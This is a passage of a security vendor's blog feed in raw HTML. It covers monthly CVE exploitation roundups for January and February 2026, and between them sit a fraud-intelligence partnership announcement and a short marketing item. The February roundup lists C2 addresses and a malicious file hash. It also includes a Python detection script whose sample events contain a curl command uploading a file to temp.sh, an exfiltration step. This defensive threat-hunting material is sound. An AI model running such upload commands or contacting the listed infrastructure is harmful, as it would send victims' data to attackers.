            <div>7</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEMKEGJ/overview">CVE-2026-21525</a></div>
            <div>99</div>
            <div>Microsoft Windows</div>
            <div>CWE-476 (NULL Pointer Dereference)</div>
            <div>No</div>
          </div>
          <div>
            <div>8</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEMKEGN/overview">CVE-2026-21533</a></div>
            <div>99</div>
            <div>Microsoft Windows</div>
            <div>CWE-269 (Improper Privilege Management)</div>
            <div>*Yes</div>
          </div>
          <div>
            <div>9</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEPyPC6/overview">CVE-2026-20700</a></div>
            <div>99</div>
            <div>Apple iOS, macOS, tvOS, watchOS, and visionOS</div>
            <div>CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer)</div>
            <div>No</div>
          </div>
          <div>
            <div>10</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEThw_R/overview">CVE-2026-25108</a></div>
            <div>99</div>
            <div>Soliton Systems K.K. FileZen</div>
            <div>CWE-78 (Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'))</div>
            <div>No</div>
          </div>
          <div>
            <div>11</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BC48fmD/overview">CVE-2026-2441</a></div>
            <div>99</div>
            <div>Google Chromium</div>
            <div>CWE-416 (Use After Free)</div>
            <div><a href="https://github.com/huseyinstif/CVE-2026-2441-PoC">Yes</a></div>
          </div>
          <div>
            <div>12</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEdM197/overview">CVE-2026-22769</a></div>
            <div>99</div>
            <div>Dell RecoverPoint for Virtual Machines (RP4VMs)</div>
            <div>CWE-798 (Use of Hard-coded Credentials)</div>
            <div>No</div>
          </div>
          <div>
            <div>13</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEzsB0i/overview">CVE-2026-20127</a></div>
            <div>99</div>
            <div>Cisco Catalyst SD-WAN Controller and Manager</div>
            <div>CWE-287 (Improper Authentication)</div>
            <div><a href="https://github.com/search?q=CVE-2026-20127&amp;type=repositories">Yes</a></div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong></em> <em>List of vulnerabilities that were actively exploited in February based on Recorded Future data. *An alleged exploit for</em> <em><a href="https://app.recordedfuture.com/portal/intelligence-card/BEMKEGN/overview">CVE-2026-21533</a></em> <em>is being advertised for sale on GitHub. Recorded Future Triage was used to browse the website advertising the exploit, which can be</em> <em><a href="https://tria.ge/260305-bl376shz8w/behavioral1#:~:text=v16-,Replay%20Monitor,-Downloads">viewed here</a></em> <em>via the Replay Monitor. (Source: Recorded Future)</em></p>
        <h2><strong>Key Trends: February 2026</strong></h2>
        <h3><strong>Vendors Most Affected</strong></h3>
        <ul>
          <li><strong>Microsoft</strong> led with six vulnerabilities across Windows, Windows Server, Office, and Microsoft 365 products</li>
          <li><strong>BeyondTrust</strong> faced a critical OS command injection flaw in Remote Support (RS) versions 25.3.1 and earlier, and Privileged Remote Access (PRA) versions 24.3.4 and earlier</li>
          <li><strong>Cisco</strong> saw active exploitation of an authentication bypass in Catalyst SD-WAN infrastructure</li>
          <li>Additional affected vendors: Notepad++, Apple, Soliton Systems K.K., Google, and Dell</li>
        </ul>
        <h3><strong>Most Common Weakness Types</strong></h3>
        <ul>
          <li><strong>CWE-78</strong> – OS Command Injection (tied for most common)</li>
          <li><strong>CWE-693</strong> – Protection Mechanism Failure (tied for most common)</li>
          <li><strong>CWE-476</strong> – NULL Pointer Dereference</li>
          <li><strong>CWE-843</strong> – Type Confusion</li>
          <li><strong>CWE-807</strong> – Reliance on Untrusted Inputs in a Security Decision</li>
        </ul>
        <h3><strong>Exploitation Activity</strong></h3>
        <p><strong>Vulnerabilities associated with malware campaigns:</strong></p>
        <ul>
          <li><strong>Lotus Blossom</strong> (suspected China state-sponsored) exploited <strong>CVE-2025-15556</strong> to hijack Notepad++ update traffic between June and December 2025. The campaign rotated C2 servers across three attack chains to deliver a Metasploit loader, Cobalt Strike Beacon, and a custom backdoor called Chrysalis.</li>
          <li><strong>APT28</strong> (Russian state-sponsored) exploited <strong>CVE-2026-21513</strong> using malicious Windows Shortcut (.lnk) files with embedded HTML payloads for multi-stage payload delivery, with observed network communication to infrastructure associated with the threat group.</li>
          <li><strong>UNC6201</strong> (suspected China-nexus) exploited <strong>CVE-2026-22769</strong> to compromise Dell RecoverPoint for VMs appliances, deploying the SLAYSTYLE web shell, BRICKSTORM backdoor, and GRIMBOLT, a C#-based backdoor with native AOT compilation to complicate detection.</li>
        </ul>
        <p><strong>Long-running exploitation activity:</strong></p>
        <ul>
          <li><strong>UAT-8616</strong> exploited <strong>CVE-2026-20127</strong>, chaining it with CVE-2022-20775 to achieve root-level access on Cisco Catalyst SD-WAN systems, with <a href="https://blog.talosintelligence.com/uat-8616-sd-wan/">Cisco Talos attributing</a> the activity to a sophisticated threat actor and assessing that the activity dates back to at least 2023.</li>
        </ul>
        <h2><strong>Priority Alert: Active Exploitation</strong></h2>
        <p>These vulnerabilities demand immediate attention due to confirmed exploitation in the wild.</p>
        <h3>CVE-2025-15556 | Notepad++</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | CISA KEV: Added February 12, 2026</p>
        <p><strong>Why this matters:</strong> Lotus Blossom exploited this flaw to replace legitimate Notepad++ update packages with malicious installers, deploying Cobalt Strike and the Chrysalis backdoor to targeted users over a six-month period. The vulnerability affects the WinGUp updater used by Notepad++ versions prior to 8.8.9, which fails to cryptographically verify downloaded update metadata and installers.</p>
        <p><strong>Affected versions:</strong> Notepad++ versions prior to 8.8.9 (version 8.9.1 recommended)</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Update to Notepad++ version 8.9.1, released January 26, 2026</li>
          <li>Hunt for the malicious update.exe sample (SHA256: 4d4aec6120290e21778c1b14c94aa6ebff3b0816fb6798495dc2eae165db4566) in your environment</li>
          <li>Monitor for GUP.exe spawning unexpected child processes</li>
          <li>Review network connections for traffic to 45[.]76[.]155[.]202, 45[.]77[.]31[.]210, 45[.]32[.]144[.]255, or 95[.]179[.]213[.]0</li>
          <li>Check for directories named ProShow under %APPDATA% or unexpected files in %APPDATA%\Adobe\Scripts\</li>
          <li>Block or alert on curl.exe uploading files to temp[.]sh</li>
        </ul>
        <p><strong>Known C2 infrastructure:</strong> 45[.]76[.]155[.]202, 45[.]77[.]31[.]210, cdncheck[.]it[.]com, safe-dns[.]it[.]com, 95[.]179[.]213[.]0</p>
        <p><strong>Detection resources:</strong> Insikt Group created Sigma rules to detect update.exe's execution of reconnaissance commands (whoami, tasklist, systeminfo, and netstat -ano) and curl commands for system information exfiltration, available to Recorded Future customers.</p>
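        <p>As an added illustration of the hunt described in the immediate actions and detection resources above (example code written for this post, not Insikt Group's Sigma rules or any Recorded Future tooling), the script below runs the listed indicators over constructed Sysmon-style JSON events: the update.exe hash, the updater spawning reconnaissance commands, curl.exe uploading to temp.sh, connections to the known C2 addresses, and files landing under the ProShow and Adobe\Scripts paths. The event field names follow Sysmon conventions; the sample telemetry is constructed and not real.</p>

```python
"""Hunt constructed Sysmon-style events for the CVE-2025-15556 (Notepad++
WinGUp) indicators quoted in this post. Added example; not the vendor's rules."""
import json
import re

# Indicators from the post, with the defanging brackets removed for matching.
MALICIOUS_UPDATE_SHA256 = "4d4aec6120290e21778c1b14c94aa6ebff3b0816fb6798495dc2eae165db4566"
C2_IPS = {"45.76.155.202", "45.77.31.210", "45.32.144.255", "95.179.213.0"}
C2_DOMAINS = {"cdncheck.it.com", "safe-dns.it.com"}
# Reconnaissance binaries the post says the malicious update.exe executes.
RECON_IMAGES = {"whoami.exe", "tasklist.exe", "systeminfo.exe", "netstat.exe"}
UPDATER_IMAGES = {"gup.exe", "update.exe"}
UPLOAD_FLAGS = {"-T", "--upload-file", "-F", "--form", "-d", "--data", "--data-binary"}
# %APPDATA% resolves to <profile>\AppData\Roaming on Windows.
SUSPICIOUS_PATHS = re.compile(r"\\AppData\\Roaming\\(ProShow|Adobe\\Scripts)\\", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path ('' when absent)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def sha256_of(hashes_field):
    """Pull the SHA256 value out of a Sysmon 'Hashes' field such as 'SHA256=..,MD5=..'."""
    m = re.search(r"SHA256=([0-9a-fA-F]{64})", hashes_field or "")
    return m.group(1).lower() if m else None


def hunt_event(ev):
    """Return the names of every indicator that matches a single event."""
    hits = []
    eid = ev.get("EventID")
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    if eid == 1:  # process creation
        if sha256_of(ev.get("Hashes")) == MALICIOUS_UPDATE_SHA256:
            hits.append("malicious_update_exe_hash")
        if parent in UPDATER_IMAGES and image in RECON_IMAGES:
            # netstat only counts with the -ano switch the post names.
            if image != "netstat.exe" or "-ano" in cmd.lower():
                hits.append("updater_spawned_recon")
        if image == "curl.exe" and "temp.sh" in cmd.lower():
            tokens = cmd.split()
            if any(t in UPLOAD_FLAGS or t.split("=")[0] in UPLOAD_FLAGS for t in tokens):
                hits.append("curl_upload_to_temp_sh")
    elif eid == 3:  # network connection
        host = (ev.get("DestinationHostname") or "").lower()
        if ev.get("DestinationIp") in C2_IPS or host in C2_DOMAINS:
            hits.append("known_c2_contact")
    elif eid == 11:  # file create
        if SUSPICIOUS_PATHS.search(ev.get("TargetFilename", "")):
            hits.append("suspicious_appdata_path")
    return hits


def hunt(lines):
    """Run every rule over newline-delimited JSON events; return (line_no, hit) pairs."""
    results = []
    for n, line in enumerate(lines, 1):
        line = line.strip()
        if not line:
            continue
        for hit in hunt_event(json.loads(line)):
            results.append((n, hit))
    return results


# Constructed sample telemetry (not real events), one JSON object per line.
SAMPLE_EVENTS = r"""
{"EventID": 1, "Image": "C:\\Users\\alice\\AppData\\Roaming\\ProShow\\update.exe", "ParentImage": "C:\\Program Files\\Notepad++\\updater\\GUP.exe", "CommandLine": "update.exe", "Hashes": "SHA256=4D4AEC6120290E21778C1B14C94AA6EBFF3B0816FB6798495DC2EAE165DB4566"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\whoami.exe", "ParentImage": "C:\\Users\\alice\\AppData\\Roaming\\ProShow\\update.exe", "CommandLine": "whoami"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\NETSTAT.EXE", "ParentImage": "C:\\Users\\alice\\AppData\\Roaming\\ProShow\\update.exe", "CommandLine": "netstat -ano"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\whoami.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "whoami"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\curl.exe", "ParentImage": "C:\\Users\\alice\\AppData\\Roaming\\ProShow\\update.exe", "CommandLine": "curl.exe -T C:\\Users\\alice\\AppData\\Local\\Temp\\s.txt https://temp.sh/upload"}
{"EventID": 3, "Image": "C:\\Users\\alice\\AppData\\Roaming\\ProShow\\update.exe", "DestinationIp": "45.76.155.202", "DestinationPort": 443}
{"EventID": 3, "Image": "C:\\Users\\alice\\AppData\\Roaming\\ProShow\\update.exe", "DestinationIp": "10.0.0.7", "DestinationHostname": "safe-dns.it.com"}
{"EventID": 3, "Image": "C:\\Program Files\\Notepad++\\updater\\GUP.exe", "DestinationIp": "140.82.112.3", "DestinationHostname": "github.com"}
{"EventID": 11, "Image": "C:\\Users\\alice\\AppData\\Roaming\\ProShow\\update.exe", "TargetFilename": "C:\\Users\\alice\\AppData\\Roaming\\Adobe\\Scripts\\libcurl.dll"}
"""


def run_sample():
    """Hunt over the constructed sample; 7 of the 9 events should produce a hit."""
    return hunt(SAMPLE_EVENTS.strip().splitlines())


if __name__ == "__main__":
    for line_no, hit in run_sample():
        print(f"line {line_no}: {hit}")
```

The two clean events (whoami under cmd.exe and GUP.exe reaching github.com) show that the rules key on the updater as parent and on the specific infrastructure, not on the recon binaries or the updater alone.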
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_155577ae992ec4ffecd3c5a7fa077ece6041dcb4c.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="801" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em>Risk Rules History from</em> <em><a href="https://www.recordedfuture.com/ko/products/vulnerability-intelligence">Vulnerability Intelligence</a></em> <em>Card® for CVE-2025-15556 in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1eb057ac8d9e33292f2d343e2c01e9ea4a86902bd.jpg?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Latin America's Cybersecurity Turning Point: From Reactive Defense to Threat Intelligence]]></title>
            <link>https://www.recordedfuture.com/ko/blog/latin-america-cybersecurity-turning-point</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/latin-america-cybersecurity-turning-point</guid>
            <pubDate>Tue, 03 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Latin America's threat landscape is evolving fast — and reactive defense is no longer enough. PIX fraud, ransomware, and targeted attacks are outpacing overstretched security teams. Recorded Future provides LATAM-specific intelligence, automation, and seamless integrations to help your team get ahead of threats before they hit.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li>Latin America faces a distinct and evolving cyber threat landscape, from PIX payment fraud to ransomware hitting critical infrastructure.</li>
          <li>Most LATAM security teams are still reactive by necessity, and that posture is costing organizations in downtime, data, and trust.</li>
          <li>Recorded Future offers LATAM-specific threat intelligence, automation, and 100+ integrations to help stretched teams get ahead of attacks before they land.</li>
          <li>Meet us at RSA Booth N-6090 to see how intelligence-led security can transform your team's posture, from response to prevention.</li>
          <li>Join our upcoming webinar to learn what proactive intelligence looks like for your region.<br />Understanding the Dark Covenant, Its Evolution, and Impact</li>
        </ul>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_17ffeff1c5b7cfe37313bfcf34dda6673c3c7026d.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Recorded Future Expands Coverage of Scams and Financial Fraud with Money Mule Intelligence from CYBERA]]></title>
            <link>https://www.recordedfuture.com/ko/blog/recorded-future-money-mule-intelligence-cybera</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/recorded-future-money-mule-intelligence-cybera</guid>
            <pubDate>Thu, 26 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Recorded Future is expanding its payment fraud prevention capabilities through a partnership with CYBERA, the industry leader in detecting and verifying data on scam-linked bank accounts.]]></description>
            <content:encoded><![CDATA[
        <p>Recorded Future is expanding its payment fraud prevention capabilities through a partnership with <a href="https://www.cybera.io/company/contact">CYBERA</a>, the industry leader in detecting and verifying data on scam-linked bank accounts.</p>
        <p>Available for purchase now via the Recorded Future Platform, Money Mule Intelligence helps fraud teams identify the accounts criminals use to extract and move stolen funds—addressing a critical gap as scams increasingly become banks' most pressing fraud challenge.</p>
        <h2><strong>The Growing Threat of Authorized Push Payment Fraud</strong></h2>
        <p>Authorized Push Payment (APP) fraud is accelerating. In the U.S., APP fraud losses are projected to reach nearly $15B by 2028, up from $8.3B in 2024, according to <a href="https://www.deloitte.com/us/en/insights/industry/financial-services/authorized-push-payment-fraud.html">Deloitte</a>. While traditional card fraud continues to decline, APP fraud is climbing, fueled by AI-generated deepfakes, personalized scam scripts, and instant payment systems like FedNow and Zelle that move money faster than conventional fraud controls can intercept it.</p>
        <p>Mule accounts, or money mules, are part of the critical infrastructure that makes these scams possible. They provide the bridge that converts stolen payments into untraceable cash or cryptocurrency. Without them, most APP fraud would collapse because criminals cannot risk receiving funds directly into their own accounts. By the time victims realize they've been scammed, mule accounts have already moved the money through multiple layers, typically ending in cash withdrawals or crypto conversions.</p>
        <p>Additionally, the sophistication of mule operations is increasing. Criminal organizations now employ "mule herders" who manage hundreds of accounts at once, using AI to simulate normal transaction behavior (grocery purchases, streaming subscriptions, etc.) so accounts don't appear dormant or suspicious. This makes detection through traditional pattern analysis increasingly difficult.</p>
        <p>Regulators are responding by shifting liability to banks, often viewing those allowing mule accounts to operate as part of the criminal infrastructure itself. For example, the UK now requires banks to reimburse scam victims and allows them to delay suspicious payments for investigation, while U.S. regulators are signaling that banks may be held liable for failing to detect mule accounts.</p>
        <p>Detecting mule accounts is fundamentally difficult. They’re designed to blend in with legitimate activity, and traditional fraud controls can struggle to distinguish between a genuine customer payment and a scam transfer until it's too late.</p>
        <h2><strong>CYBERA's Approach to Mule Intelligence</strong></h2>
        <p>The challenge of detecting and disrupting mule account networks is what led CYBERA's founders to build their solution. Coming from legal practice and law enforcement, CYBERA's leadership team worked scam cases where they witnessed how recovery becomes impossible once funds move through the financial system. They realized that money mule networks represent a central vulnerability in the scam economy, one that banks had limited visibility into.</p>
        <p>Today, CYBERA helps banks and payment networks disrupt scams at the point where funds are extracted. CYBERA's AI-powered Scam Engagement System generates intelligence on bank accounts and payment endpoints actively used by scam networks.</p>
        <p>Unlike probabilistic risk scoring, CYBERA verifies each account, providing evidence and contextual metadata to enable proactive prevention across both internal accounts and outbound payments while minimizing false positives.</p>
        <p>CYBERA supports two core use cases:</p>
        <ul>
          <li><strong>On-Us Mule Detection</strong>, which helps identify mule accounts held at your institution that are already linked to confirmed scam activity. This enables early detection and disruption of high-risk accounts, reducing downstream fraud, repeat victimization, and regulatory exposure within a bank’s accountholders.</li>
          <li><strong>Off-Us Screening</strong>, which screens outbound payments to external beneficiary accounts before execution, helping to prevent customers from sending funds to scammer-controlled accounts. This is particularly valuable for high-value transfers, social engineering attacks, and customer-initiated payments where traditional controls are limited.</li>
        </ul>
        <p>Large financial institutions have already prevented multiple six-figure losses by embedding CYBERA’s intelligence into their transaction monitoring workflows. CYBERA has also been accepted as a member of the Mastercard Start Path program, making it the first Recorded Future partner to achieve this distinction and further validating its role in the payments ecosystem.</p>
        <h2><strong>How Money Mule Intelligence Expands Payment Fraud Intelligence</strong></h2>
        <p><a href="https://www.recordedfuture.com/ko/products/payment-fraud-intelligence">Payment Fraud Intelligence</a> (PFI) correlates the widest set of disparate, pre-monetization indicators of fraud to help teams act before their customers are impacted. Money Mule Intelligence extends that capability, giving fraud teams the verified intelligence needed to make high-confidence decisions that disrupt scams by flagging accounts that have been confirmed as mule infrastructure through direct investigation. Together, they provide coverage from initial compromise through attempted cash-out, helping fraud teams prevent losses at multiple intervention points.</p>
        <div>
          <div>
            <div>“Securing payments requires more than reacting to fraud — it requires anticipating it. Integrating Money Mule Intelligence strengthens our ability to illuminate the infrastructure behind financial crime, which is fully aligned with our strategy of securing payments with intelligence.”</div>
          </div>
          <div>
            <div>
              <p><strong>Jamie Zajac</strong></p>
              <p>Chief Product Officer at Recorded Future</p>
            </div>
          </div>
        </div>
        <p>As regulators increasingly expect banks to prevent scam-enabled transfers, Money Mule Intelligence provides the verified data needed to comply with emerging reimbursement requirements while reducing the operational burden of post-incident investigation and remediation.</p>
        <p>PFI users that purchase this capability can now act on both sides of the transaction—compromised payment instruments and scam-linked receiving accounts—with evidence-backed intelligence that minimizes false positives and aligns with the industry's shift toward proactive fraud prevention.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1f90928a17759f89a1ada2a65299215200ab27b00.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[January 2026 CVE Landscape: 23 Critical Vulnerabilities Mark 5% Increase, APT28 Exploits Microsoft Office Zero-Day]]></title>
            <link>https://www.recordedfuture.com/ko/blog/january-2026-cve-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/january-2026-cve-landscape</guid>
            <pubDate>Tue, 24 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[January 2026 saw 23 actively exploited CVEs, including APT28’s Microsoft Office zero-day and critical auth bypass flaws impacting enterprise systems.]]></description>
            <content:encoded><![CDATA[
        <p>January 2026 saw a modest 5% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 23 vulnerabilities requiring immediate remediation, up from 22 in December 2025. Noteworthy trends last month included Russian state-sponsored exploitation of a Microsoft Office zero-day and critical authentication bypass flaws affecting enterprise infrastructure.</p>
        <p><strong>What security teams need to know:</strong></p>
        <ul>
          <li><strong>APT28's Operation Neusploit:</strong> Russian state-sponsored actors exploited CVE-2026-21509 (Microsoft Office) via weaponized RTF files, delivering MiniDoor, PixyNetLoader, and Covenant Grunt implants</li>
          <li><strong>Microsoft and SmarterTools lead concerns:</strong> These vendors accounted for 30% of January's vulnerabilities, with multiple critical authentication bypass and RCE flaws</li>
          <li><strong>Public exploits proliferate:</strong> Fourteen of the 23 vulnerabilities reported have public proof-of-concept exploit code available</li>
          <li><strong>Code Injection dominates:</strong> CWE-94 (Code Injection) was the most common weakness type, followed by CWE-288 (Authentication Bypass Using an Alternate Path or Channel) and CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor)</li>
        </ul>
        <p><strong>Bottom line:</strong> The slight increase masks significant threats. APT28's zero-day exploitation and multiple critical authentication bypass flaws demonstrate that threat actors continue targeting enterprise communication and management platforms for initial access and persistence.</p>
        <h2>Quick Reference Table</h2>
        <p><em>All 23 vulnerabilities below were actively exploited in January 2026.</em></p>
        <table>
          <thead>
            <tr><th>#</th><th>Vulnerability</th><th>Risk Score</th><th>Affected Vendor/Product</th><th>Vulnerability Type/Component</th><th>Public PoC</th></tr>
          </thead>
          <tbody>
            <tr><td>1</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-20029">CVE-2026-20029</a></td><td>99</td><td>Cisco Identity Services Engine Software</td><td>CWE-611 (Improper Restriction of XML External Entity Reference)</td><td>No</td></tr>
            <tr><td>2</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-20805">CVE-2026-20805</a></td><td>99</td><td>Microsoft Windows</td><td>CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor)</td><td><a href="https://github.com/search?q=CVE-2026-20805&amp;type=repositories">Yes</a></td></tr>
            <tr><td>3</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-20931">CVE-2026-20931</a></td><td>99</td><td>Microsoft Windows</td><td>CWE-73 (External Control of File Name or Path)</td><td>No</td></tr>
            <tr><td>4</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-23550">CVE-2026-23550</a></td><td>99</td><td>Modular DS Plugin</td><td>CWE-266 (Incorrect Privilege Assignment)</td><td><a href="https://github.com/search?q=CVE-2026-23550&amp;type=repositories">Yes</a></td></tr>
            <tr><td>5</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-24061">CVE-2026-24061</a></td><td>99</td><td>GNU InetUtils</td><td>CWE-88 (Argument Injection)</td><td><a href="https://github.com/search?q=CVE-2026-24061&amp;type=repositories">Yes</a></td></tr>
            <tr><td>6</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-20045">CVE-2026-20045</a></td><td>99</td><td>Cisco Unified Communications Manager</td><td>CWE-94 (Code Injection)</td><td><a href="https://github.com/search?q=CVE-2026-20045&amp;type=repositories">Yes</a></td></tr>
            <tr><td>7</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-23760">CVE-2026-23760</a></td><td>99</td><td>SmarterTools SmarterMail</td><td>CWE-288 (Authentication Bypass Using an Alternate Path or Channel)</td><td><a href="https://github.com/search?q=CVE-2026-23760&amp;type=repositories">Yes</a></td></tr>
            <tr><td>8</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-24423">CVE-2026-24423</a></td><td>99</td><td>SmarterTools SmarterMail</td><td>CWE-306 (Missing Authentication for Critical Function)</td><td><a href="https://github.com/search?q=CVE-2026-24423&amp;type=repositories">Yes</a></td></tr>
            <tr><td>9</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-21509">CVE-2026-21509</a></td><td>99</td><td>Microsoft Office</td><td>CWE-807 (Reliance on Untrusted Inputs in a Security Decision)</td><td><a href="https://github.com/search?q=CVE-2026-21509&amp;type=repositories">Yes</a></td></tr>
            <tr><td>10</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-24858">CVE-2026-24858</a></td><td>99</td><td>Fortinet Multiple Products</td><td>CWE-288 (Authentication Bypass Using an Alternate Path or Channel)</td><td><a href="https://github.com/search?q=CVE-2026-24858&amp;type=repositories">Yes</a></td></tr>
            <tr><td>11</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-40551">CVE-2025-40551</a></td><td>99</td><td>SolarWinds Web Help Desk</td><td>CWE-502 (Deserialization of Untrusted Data)</td><td>No</td></tr>
            <tr><td>12</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-1281">CVE-2026-1281</a></td><td>99</td><td>Ivanti Endpoint Manager Mobile (EPMM)</td><td>CWE-94 (Code Injection)</td><td><a href="https://github.com/search?q=CVE-2026-1281&amp;type=repositories">Yes</a></td></tr>
            <tr><td>13</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-1340">CVE-2026-1340</a></td><td>99</td><td>Ivanti Endpoint Manager Mobile (EPMM)</td><td>CWE-94 (Code Injection)</td><td><a href="https://github.com/search?q=CVE-2026-1340&amp;type=repositories">Yes</a></td></tr>
            <tr><td>14</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2018-14634">CVE-2018-14634</a></td><td>99</td><td>Linux Kernel</td><td>CWE-190 (Integer Overflow or Wraparound)</td><td><a href="https://github.com/search?q=CVE-2018-14634&amp;type=repositories">Yes</a></td></tr>
            <tr><td>15</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-52691">CVE-2025-52691</a></td><td>99</td><td>SmarterTools SmarterMail</td><td>CWE-434 (Unrestricted Upload of File with Dangerous Type)</td><td><a href="https://github.com/search?q=CVE-2025-52691&amp;type=repositories">Yes</a></td></tr>
            <tr><td>16</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2024-37079">CVE-2024-37079</a></td><td>99</td><td>Broadcom VMware vCenter Server</td><td>CWE-787 (Out-of-bounds Write)</td><td>No</td></tr>
            <tr><td>17</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-68645">CVE-2025-68645</a></td><td>99</td><td>Synacor Zimbra Collaboration Suite (ZCS)</td><td>CWE-98 (PHP Remote File Inclusion)</td><td><a href="https://github.com/search?q=CVE-2025-68645&amp;type=repositories">Yes</a></td></tr>
            <tr><td>18</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-34026">CVE-2025-34026</a></td><td>99</td><td>Versa Concerto</td><td>CWE-288 (Authentication Bypass Using an Alternate Path or Channel)</td><td>No</td></tr>
            <tr><td>19</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-31125">CVE-2025-31125</a></td><td>99</td><td>Vite Vitejs</td><td>CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor), CWE-284 (Improper Access Control)</td><td><a href="https://github.com/search?q=CVE-2025-31125&amp;type=repositories">Yes</a></td></tr>
            <tr><td>20</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-54313">CVE-2025-54313</a></td><td>99</td><td>Prettier eslint-config-prettier</td><td>CWE-506 (Embedded Malicious Code)</td><td>No</td></tr>
            <tr><td>21</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-8110">CVE-2025-8110</a></td><td>89</td><td>Gogs</td><td>CWE-22 (Path Traversal)</td><td><a href="https://github.com/search?q=CVE-2025-8110&amp;type=repositories">Yes</a></td></tr>
            <tr><td>22</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2009-0556">CVE-2009-0556</a></td><td>89</td><td>Microsoft Office</td><td>CWE-94 (Code Injection)</td><td>No</td></tr>
            <tr><td>23</td><td><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-37164">CVE-2025-37164</a></td><td>89</td><td>Hewlett Packard Enterprise OneView</td><td>CWE-94 (Code Injection)</td><td><a href="https://github.com/search?q=CVE-2025-37164&amp;type=repositories">Yes</a></td></tr>
          </tbody>
        </table>
        <p><em><strong>Table 1:</strong> List of vulnerabilities that were actively exploited in January based on Recorded Future data (Source: Recorded Future)</em></p>
        <h2>Key Trends in January 2026</h2>
        <h3>Affected Vendors</h3>
        <ul>
          <li><strong>Microsoft</strong> faced four critical vulnerabilities across Windows and Office products, including APT28's zero-day exploitation of CVE-2026-21509</li>
          <li><strong>SmarterTools</strong> accounted for three critical vulnerabilities affecting SmarterMail, all enabling authentication bypass or RCE</li>
          <li><strong>Cisco</strong> saw two critical flaws in Identity Services Engine and Unified Communications Manager</li>
          <li><strong>Ivanti</strong> dealt with two pre-authentication RCE vulnerabilities in Endpoint Manager Mobile</li>
          <li>Additional affected vendors/projects: Fortinet, SolarWinds, Broadcom, Synacor, Versa, Hewlett Packard Enterprise, GNU, Linux, Vite, Prettier, Gogs, and Modular DS</li>
        </ul>
        <h3>Most Common Weakness Types</h3>
        <ul>
          <li><strong>CWE-94</strong> – Code Injection</li>
          <li><strong>CWE-288</strong> – Authentication Bypass Using an Alternate Path or Channel</li>
          <li><strong>CWE-200</strong> – Exposure of Sensitive Information to an Unauthorized Actor</li>
        </ul>
        <h3>Threat Actor Activity</h3>
